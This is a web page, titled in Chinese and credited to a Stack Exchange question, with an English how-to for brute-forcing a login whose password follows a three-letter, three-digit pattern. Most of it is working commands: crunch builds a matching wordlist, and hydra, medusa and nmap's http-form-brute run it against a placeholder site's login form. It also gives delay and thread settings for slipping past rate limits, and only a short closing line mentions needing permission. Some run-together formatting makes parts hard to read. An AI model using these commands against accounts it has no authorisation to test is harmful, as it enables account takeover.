如何暴力破解特定格式密码的登录?Kali Linux工具及命令
Great question! Since your target password follows a strict 3-letter + 3-digit pattern (like abc123), we can either generate a custom dictionary tailored exactly to this format first, or leverage tools that work with pattern-based brute-forcing. Here are the most reliable tools and practical commands you’ll use in Kali Linux for this scenario:
First, you’ll want to generate a dictionary that only contains combinations matching your 3-letter + 3-digit rule—this saves time vs. using a generic wordlist. Crunch is perfect for this:
# Generate a lowercase letter + numeric dictionary (e.g., abc123, xyz987) crunch 6 6 -t @@@%%% -o 3letter3num.txt
Parameter breakdown:
6 6: Forces all entries to be exactly 6 characters long-t @@@%%%: Template where@@@= lowercase letters (use,,,for uppercase,???for mixed case) and%%%= digits-o 3letter3num.txt: Saves the generated dictionary to a file
If you need to include uppercase letters too, use a custom charset:
crunch 6 6 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -t @@@%%% -o mixed_case_dict.txt
Hydra supports almost every common protocol (HTTP, FTP, SSH, etc.) and works great with our custom dictionary. Let’s assume you’re targeting an HTTP form login:
# Brute-force a POST login form with a single username (e.g., "admin") hydra -l admin -P 3letter3num.txt target-domain.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid credentials"
Parameter breakdown:
-l admin: Specifies the target username (use-L users.txtfor a list of usernames)-P 3letter3num.txt: Points to our custom dictionaryhttp-post-form: Tells Hydra we’re targeting an HTTP POST form/login.php:username=^USER^&password=^PASS^: The form path and parameters (replace with your actual form fields):F=Invalid credentials: Marks "Invalid credentials" as the failure string (Hydra stops when this string doesn’t appear in the response)
To avoid getting blocked by rate limits, add a delay between requests:
hydra -l admin -P 3letter3num.txt -w 2 target-domain.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid credentials"
The -w 2 flag adds a 2-second wait between each attempt.
Medusa is faster and more lightweight than Hydra for some use cases. Here’s how to use it with our dictionary:
medusa -h target-domain.com -u admin -P 3letter3num.txt -M http -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^ -m DENY:"Invalid credentials"
Parameter breakdown:
-h target-domain.com: Target hostname/IP-u admin: Single target username-P 3letter3num.txt: Custom dictionary-M http: Target protocol-m DIR:/login.php: Login page path-m FORM:username=^USER^&password=^PASS^: Form parameters-m DENY:"Invalid credentials": String that indicates a failed login
If you prefer using Nmap, its http-form-brute script can handle this scenario too:
# Brute-force with a single username and our custom dictionary nmap --script http-form-brute --script-args user=admin,passdb=3letter3num.txt,http-form-brute.path=/login.php,http-form-brute.form="username=^USER^&password=^PASS^" target-domain.com
This script will iterate through the dictionary and report any successful logins.
Important Notes:
- Always ensure you have explicit, written permission to test the target system—unauthorized password cracking is illegal and unethical.
- Many websites have rate limiting or CAPTCHAs that will block brute-force attempts. Adjust thread counts (e.g., Hydra’s
-t 4to use 4 threads) or add delays to avoid this. - If the password uses mixed case letters, update your Crunch template or charset to include uppercase characters.
内容的提问来源于stack exchange,提问作者Max Roatta

